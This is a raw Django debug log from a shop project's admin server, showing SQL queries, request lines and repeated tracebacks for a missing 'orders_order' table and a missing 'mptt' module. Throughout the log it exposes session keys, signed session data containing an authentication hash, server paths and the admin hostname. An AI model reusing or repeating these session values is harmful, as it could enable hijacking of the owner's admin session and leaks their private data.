"auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-05 07:48:29,198 utils 25067 140223400105728 (0.002) SELECT "django_admin_log"."id", "django_admin_log"."action_time", "django_admin_log"."user_id", "django_admin_log"."content_type_id", "django_admin_log"."object_id", "django_admin_log"."object_repr", "django_admin_log"."action_flag", "django_admin_log"."change_message", "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined", "django_content_type"."id", "django_content_type"."app_label", "django_content_type"."model" FROM "django_admin_log" INNER JOIN "auth_user" ON ("django_admin_log"."user_id" = "auth_user"."id") LEFT OUTER JOIN "django_content_type" ON ("django_admin_log"."content_type_id" = "django_content_type"."id") WHERE "django_admin_log"."user_id" = 6 ORDER BY "django_admin_log"."action_time" DESC LIMIT 10; args=(6,) DEBUG 2019-12-05 07:48:29,202 utils 25067 140223400105728 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-19T07:48:29.200612+00:00'::timestamptz WHERE "django_session"."session_key" = 'd7pf9z12rq486ubfvq2gsrikii6tex3m'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 19, 7, 48, 29, 200612, tzinfo=), 'd7pf9z12rq486ubfvq2gsrikii6tex3m') [05/Dec/2019 07:48:29] "GET / HTTP/1.0" 200 6019 DEBUG 2019-12-05 07:48:37,156 utils 25067 140223400105728 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-05T07:48:37.142185+00:00'::timestamptz AND "django_session"."session_key" = 'd7pf9z12rq486ubfvq2gsrikii6tex3m'); args=(datetime.datetime(2019, 12, 5, 7, 48, 37, 142185, tzinfo=), 'd7pf9z12rq486ubfvq2gsrikii6tex3m') DEBUG 2019-12-05 07:48:37,160 utils 25067 140223400105728 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-05 07:48:37,212 utils 25067 140223400105728 (0.004) SELECT "django_admin_log"."id", "django_admin_log"."action_time", "django_admin_log"."user_id", "django_admin_log"."content_type_id", "django_admin_log"."object_id", "django_admin_log"."object_repr", "django_admin_log"."action_flag", "django_admin_log"."change_message", "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined", "django_content_type"."id", "django_content_type"."app_label", "django_content_type"."model" FROM "django_admin_log" INNER JOIN "auth_user" ON ("django_admin_log"."user_id" = "auth_user"."id") LEFT OUTER JOIN "django_content_type" ON ("django_admin_log"."content_type_id" = "django_content_type"."id") WHERE "django_admin_log"."user_id" = 6 ORDER BY "django_admin_log"."action_time" DESC LIMIT 10; args=(6,) DEBUG 2019-12-05 07:48:37,216 utils 25067 140223400105728 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-19T07:48:37.214438+00:00'::timestamptz WHERE "django_session"."session_key" = 'd7pf9z12rq486ubfvq2gsrikii6tex3m'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 19, 7, 48, 37, 214438, tzinfo=), 'd7pf9z12rq486ubfvq2gsrikii6tex3m') [05/Dec/2019 07:48:37] "GET / HTTP/1.0" 200 6019 DEBUG 2019-12-05 07:49:03,481 utils 25067 140223400105728 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-05T07:49:03.470093+00:00'::timestamptz AND "django_session"."session_key" = 'd7pf9z12rq486ubfvq2gsrikii6tex3m'); args=(datetime.datetime(2019, 12, 5, 7, 49, 3, 470093, tzinfo=), 'd7pf9z12rq486ubfvq2gsrikii6tex3m') DEBUG 2019-12-05 07:49:03,485 utils 25067 140223400105728 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-05 07:49:03,491 utils 25067 140223400105728 (0.001) SELECT COUNT(*) AS "__count" FROM "orders_order"; args=() DEBUG 2019-12-05 07:49:03,524 utils 25067 140223400105728 (0.001) SELECT "orders_order"."id", "orders_order"."first_name", "orders_order"."last_name", "orders_order"."email", "orders_order"."address", "orders_order"."postal_code", "orders_order"."city", "orders_order"."created", "orders_order"."updated", "orders_order"."paid" FROM "orders_order" ORDER BY "orders_order"."created" DESC, "orders_order"."id" DESC LIMIT 21; args=() DEBUG 2019-12-05 07:49:03,525 utils 25067 140223400105728 (0.000) SELECT "orders_order"."id", "orders_order"."first_name", "orders_order"."last_name", "orders_order"."email", "orders_order"."address", "orders_order"."postal_code", "orders_order"."city", "orders_order"."created", "orders_order"."updated", "orders_order"."paid" FROM "orders_order" ORDER BY "orders_order"."created" DESC, "orders_order"."id" DESC LIMIT 21; args=() Internal Server Error: /orders/order/ Traceback (most recent call last): File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute return self.cursor.execute(sql, params) psycopg2.errors.UndefinedTable: relation "orders_order" does not exist LINE 1: SELECT COUNT(*) AS "__count" FROM "orders_order" ^ The above exception was the direct cause of the following exception: Traceback (most recent call last): File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/exception.py", line 34, in inner response = get_response(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/base.py", line 115, in _get_response response = self.process_exception_by_middleware(e, request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/base.py", line 113, in _get_response response = wrapped_callback(request, *callback_args, **callback_kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/contrib/admin/options.py", line 606, in wrapper return self.admin_site.admin_view(view)(*args, **kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/decorators.py", line 142, in _wrapped_view response = view_func(request, *args, **kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/views/decorators/cache.py", line 44, in _wrapped_view_func response = view_func(request, *args, **kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/contrib/admin/sites.py", line 223, in inner return view(request, *args, **kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/decorators.py", line 45, in _wrapper return bound_method(*args, **kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/decorators.py", line 142, in _wrapped_view response = view_func(request, *args, **kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/contrib/admin/options.py", line 1672, in changelist_view cl = self.get_changelist_instance(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/contrib/admin/options.py", line 744, in get_changelist_instance sortable_by, File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/contrib/admin/views/main.py", line 82, in __init__ self.get_results(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/contrib/admin/views/main.py", line 210, in get_results result_count = paginator.count File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/functional.py", line 80, in __get__ res = instance.__dict__[self.name] = self.func(instance) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/paginator.py", line 91, in count return c() File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/query.py", line 392, in count return self.query.get_count(using=self.db) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/sql/query.py", line 504, in get_count number = obj.get_aggregation(using, ['__count'])['__count'] File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/sql/query.py", line 489, in get_aggregation result = compiler.execute_sql(SINGLE) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1100, in execute_sql cursor.execute(sql, params) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 99, in execute return super().execute(sql, params) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 67, in execute return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 76, in _execute_with_wrappers return executor(sql, params, many, context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute return self.cursor.execute(sql, params) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/utils.py", line 89, in __exit__ raise dj_exc_value.with_traceback(traceback) from exc_value File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute return self.cursor.execute(sql, params) django.db.utils.ProgrammingError: relation "orders_order" does not exist LINE 1: SELECT COUNT(*) AS "__count" FROM "orders_order" ^ [05/Dec/2019 07:49:03] "GET /orders/order/ HTTP/1.0" 500 175618 [05/Dec/2019 07:52:44] "GET / HTTP/1.0" 302 0 /home/resfx/public_html/admin.resfx.com/backend/shop/views.py changed, reloading. Performing system checks... December 05, 2019 - 07:45:28 Django version 2.2.7, using settings 'django_shop_tutorial.settings' Starting development server at http://127.0.0.1:8000/ Quit the server with CONTROL-C. Watching for file changes with StatReloader Exception in thread django-main-thread: Traceback (most recent call last): File "/usr/local/lib/python3.6/threading.py", line 916, in _bootstrap_inner self.run() File "/usr/local/lib/python3.6/threading.py", line 864, in run self._target(*self._args, **self._kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/autoreload.py", line 54, in wrapper fn(*args, **kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/management/commands/runserver.py", line 109, in inner_run autoreload.raise_last_exception() File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/autoreload.py", line 77, in raise_last_exception raise _exception[1] File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/management/__init__.py", line 337, in execute autoreload.check_errors(django.setup)() File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/autoreload.py", line 54, in wrapper fn(*args, **kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/__init__.py", line 24, in setup apps.populate(settings.INSTALLED_APPS) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/apps/registry.py", line 114, in populate app_config.import_models() File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/apps/config.py", line 211, in import_models self.models_module = import_module(models_module_name) File "/usr/local/lib/python3.6/importlib/__init__.py", line 126, in import_module return _bootstrap._gcd_import(name[level:], package, level) File "", line 994, in _gcd_import File "", line 971, in _find_and_load File "", line 955, in _find_and_load_unlocked File "", line 665, in _load_unlocked File "", line 678, in exec_module File "", line 219, in _call_with_frames_removed File "/home/resfx/public_html/admin.resfx.com/backend/shop/models.py", line 3, in from mptt.models import MPTTModel, TreeForeignKey ModuleNotFoundError: No module named 'mptt' /home/resfx/public_html/admin.resfx.com/backend/django_shop_tutorial/settings.py changed, reloading. Watching for file changes with StatReloader Exception in thread django-main-thread: Traceback (most recent call last): File "/usr/local/lib/python3.6/threading.py", line 916, in _bootstrap_inner self.run() File "/usr/local/lib/python3.6/threading.py", line 864, in run self._target(*self._args, **self._kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/autoreload.py", line 54, in wrapper fn(*args, **kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/management/commands/runserver.py", line 109, in inner_run autoreload.raise_last_exception() File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/autoreload.py", line 77, in raise_last_exception raise _exception[1] File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/management/__init__.py", line 337, in execute autoreload.check_errors(django.setup)() File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/autoreload.py", line 54, in wrapper fn(*args, **kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/__init__.py", line 24, in setup apps.populate(settings.INSTALLED_APPS) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/apps/registry.py", line 91, in populate app_config = AppConfig.create(entry) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/apps/config.py", line 90, in create module = import_module(entry) File "/usr/local/lib/python3.6/importlib/__init__.py", line 126, in import_module return _bootstrap._gcd_import(name[level:], package, level) File "", line 994, in _gcd_import File "", line 971, in _find_and_load File "", line 953, in _find_and_load_unlocked ModuleNotFoundError: No module named 'mptt' /home/resfx/public_html/admin.resfx.com/backend/django_shop_tutorial/settings.py changed, reloading. Watching for file changes with StatReloader Watching for file changes with StatReloader Exception in thread django-main-thread: Traceback (most recent call last): File "/usr/local/lib/python3.6/threading.py", line 916, in _bootstrap_inner self.run() File "/usr/local/lib/python3.6/threading.py", line 864, in run self._target(*self._args, **self._kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/autoreload.py", line 54, in wrapper fn(*args, **kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/management/commands/runserver.py", line 109, in inner_run autoreload.raise_last_exception() File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/autoreload.py", line 77, in raise_last_exception raise _exception[1] File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/management/__init__.py", line 337, in execute autoreload.check_errors(django.setup)() File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/autoreload.py", line 54, in wrapper fn(*args, **kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/__init__.py", line 24, in setup apps.populate(settings.INSTALLED_APPS) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/apps/registry.py", line 114, in populate app_config.import_models() File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/apps/config.py", line 211, in import_models self.models_module = import_module(models_module_name) File "/usr/local/lib/python3.6/importlib/__init__.py", line 126, in import_module return _bootstrap._gcd_import(name[level:], package, level) File "", line 994, in _gcd_import File "", line 971, in _find_and_load File "", line 955, in _find_and_load_unlocked File "", line 665, in _load_unlocked File "", line 678, in exec_module File "", line 219, in _call_with_frames_removed File "/home/resfx/public_html/admin.resfx.com/backend/shop/models.py", line 3, in from mptt.models import MPTTModel, TreeForeignKey ModuleNotFoundError: No module named 'mptt' /home/resfx/public_html/admin.resfx.com/backend/django_shop_tutorial/settings.py changed, reloading. Exception in thread django-main-thread: Traceback (most recent call last): File "/usr/local/lib/python3.6/threading.py", line 916, in _bootstrap_inner self.run() File "/usr/local/lib/python3.6/threading.py", line 864, in run self._target(*self._args, **self._kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/autoreload.py", line 54, in wrapper fn(*args, **kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/management/commands/runserver.py", line 109, in inner_run autoreload.raise_last_exception() File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/autoreload.py", line 77, in raise_last_exception raise _exception[1] File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/management/__init__.py", line 337, in execute autoreload.check_errors(django.setup)() File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/autoreload.py", line 54, in wrapper fn(*args, **kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/__init__.py", line 24, in setup apps.populate(settings.INSTALLED_APPS) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/apps/registry.py", line 114, in populate app_config.import_models() File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/apps/config.py", line 211, in import_models self.models_module = import_module(models_module_name) File "/usr/local/lib/python3.6/importlib/__init__.py", line 126, in import_module return _bootstrap._gcd_import(name[level:], package, level) File "", line 994, in _gcd_import File "", line 971, in _find_and_load File "", line 955, in _find_and_load_unlocked File "", line 665, in _load_unlocked File "", line 678, in exec_module File "", line 219, in _call_with_frames_removed File "/home/resfx/public_html/admin.resfx.com/backend/shop/models.py", line 3, in from mptt.models import MPTTModel, TreeForeignKey ModuleNotFoundError: No module named 'mptt' /home/resfx/public_html/admin.resfx.com/backend/django_shop_tutorial/settings.py changed, reloading. Watching for file changes with StatReloader Watching for file changes with StatReloader Exception in thread django-main-thread: Traceback (most recent call last): File "/usr/local/lib/python3.6/threading.py", line 916, in _bootstrap_inner self.run() File "/usr/local/lib/python3.6/threading.py", line 864, in run self._target(*self._args, **self._kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/autoreload.py", line 54, in wrapper fn(*args, **kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/management/commands/runserver.py", line 109, in inner_run autoreload.raise_last_exception() File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/autoreload.py", line 77, in raise_last_exception raise _exception[1] File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/management/__init__.py", line 337, in execute autoreload.check_errors(django.setup)() File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/autoreload.py", line 54, in wrapper fn(*args, **kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/__init__.py", line 24, in setup apps.populate(settings.INSTALLED_APPS) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/apps/registry.py", line 91, in populate app_config = AppConfig.create(entry) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/apps/config.py", line 90, in create module = import_module(entry) File "/usr/local/lib/python3.6/importlib/__init__.py", line 126, in import_module return _bootstrap._gcd_import(name[level:], package, level) File "", line 994, in _gcd_import File "", line 971, in _find_and_load File "", line 953, in _find_and_load_unlocked ModuleNotFoundError: No module named 'mptt' /home/resfx/public_html/admin.resfx.com/backend/django_shop_tutorial/settings.py changed, reloading. Exception in thread django-main-thread: Traceback (most recent call last): File "/usr/local/lib/python3.6/threading.py", line 916, in _bootstrap_inner self.run() File "/usr/local/lib/python3.6/threading.py", line 864, in run self._target(*self._args, **self._kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/autoreload.py", line 54, in wrapper fn(*args, **kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/management/commands/runserver.py", line 109, in inner_run autoreload.raise_last_exception() File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/autoreload.py", line 77, in raise_last_exception raise _exception[1] File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/management/__init__.py", line 337, in execute autoreload.check_errors(django.setup)() File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/autoreload.py", line 54, in wrapper fn(*args, **kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/__init__.py", line 24, in setup apps.populate(settings.INSTALLED_APPS) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/apps/registry.py", line 91, in populate app_config = AppConfig.create(entry) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/apps/config.py", line 90, in create module = import_module(entry) File "/usr/local/lib/python3.6/importlib/__init__.py", line 126, in import_module return _bootstrap._gcd_import(name[level:], package, level) File "", line 994, in _gcd_import File "", line 971, in _find_and_load File "", line 953, in _find_and_load_unlocked ModuleNotFoundError: No module named 'mptt' /home/resfx/public_html/admin.resfx.com/backend/django_shop_tutorial/settings.py changed, reloading. Watching for file changes with StatReloader Watching for file changes with StatReloader Watching for file changes with StatReloader Watching for file changes with StatReloader System check identified some issues: WARNINGS: ?: (urls.W005) URL namespace 'admin' isn't unique. You may not be able to reverse all URLs in this namespace System check identified 1 issue (0 silenced). DEBUG 2019-12-05 09:10:48,227 utils 28506 139643737761536 (0.007) SELECT c.relname, CASE WHEN c.relispartition THEN 'p' WHEN c.relkind IN ('m', 'v') THEN 'v' ELSE 't' END FROM pg_catalog.pg_class c LEFT JOIN pg_catalog.pg_namespace n ON n.oid = c.relnamespace WHERE c.relkind IN ('f', 'm', 'p', 'r', 'v') AND n.nspname NOT IN ('pg_catalog', 'pg_toast') AND pg_catalog.pg_table_is_visible(c.oid) ; args=None DEBUG 2019-12-05 09:10:48,235 utils 28506 139643737761536 (0.001) SELECT "django_migrations"."app", "django_migrations"."name" FROM "django_migrations"; args=() DEBUG 2019-12-05 09:11:02,919 utils 28506 139643704579840 (0.004) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-05T09:11:02.904156+00:00'::timestamptz AND "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'); args=(datetime.datetime(2019, 12, 5, 9, 11, 2, 904156, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') DEBUG 2019-12-05 09:11:02,924 utils 28506 139643704579840 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-05 09:11:03,038 utils 28506 139643704579840 (0.004) SELECT "django_admin_log"."id", "django_admin_log"."action_time", "django_admin_log"."user_id", "django_admin_log"."content_type_id", "django_admin_log"."object_id", "django_admin_log"."object_repr", "django_admin_log"."action_flag", "django_admin_log"."change_message", "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined", "django_content_type"."id", "django_content_type"."app_label", "django_content_type"."model" FROM "django_admin_log" INNER JOIN "auth_user" ON ("django_admin_log"."user_id" = "auth_user"."id") LEFT OUTER JOIN "django_content_type" ON ("django_admin_log"."content_type_id" = "django_content_type"."id") WHERE "django_admin_log"."user_id" = 6 ORDER BY "django_admin_log"."action_time" DESC LIMIT 10; args=(6,) DEBUG 2019-12-05 09:11:03,043 utils 28506 139643704579840 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-19T09:11:03.041155+00:00'::timestamptz WHERE "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 19, 9, 11, 3, 41155, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') [05/Dec/2019 09:11:03] "GET / HTTP/1.0" 200 6019 [05/Dec/2019 09:11:03] "GET /static/admin/css/dashboard.css HTTP/1.0" 304 0 [05/Dec/2019 09:11:03] "GET /static/admin/css/responsive.css HTTP/1.0" 304 0 [05/Dec/2019 09:11:03] "GET /static/admin/css/base.css HTTP/1.0" 304 0 [05/Dec/2019 09:11:03] "GET /static/admin/img/icon-addlink.svg HTTP/1.0" 304 0 [05/Dec/2019 09:11:03] "GET /static/admin/css/fonts.css HTTP/1.0" 304 0 [05/Dec/2019 09:11:03] "GET /static/admin/img/icon-changelink.svg HTTP/1.0" 304 0 [05/Dec/2019 09:11:04] "GET /static/admin/fonts/Roboto-Bold-webfont.woff HTTP/1.0" 304 0 [05/Dec/2019 09:11:04] "GET /static/admin/fonts/Roboto-Regular-webfont.woff HTTP/1.0" 304 0 [05/Dec/2019 09:11:04] "GET /static/admin/fonts/Roboto-Light-webfont.woff HTTP/1.0" 304 0 Exception in thread django-main-thread: Traceback (most recent call last): File "/usr/local/lib/python3.6/threading.py", line 916, in _bootstrap_inner self.run() File "/usr/local/lib/python3.6/threading.py", line 864, in run self._target(*self._args, **self._kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/autoreload.py", line 54, in wrapper fn(*args, **kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/management/commands/runserver.py", line 109, in inner_run autoreload.raise_last_exception() File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/autoreload.py", line 77, in raise_last_exception raise _exception[1] File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/management/__init__.py", line 337, in execute autoreload.check_errors(django.setup)() File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/autoreload.py", line 54, in wrapper fn(*args, **kwargs) File 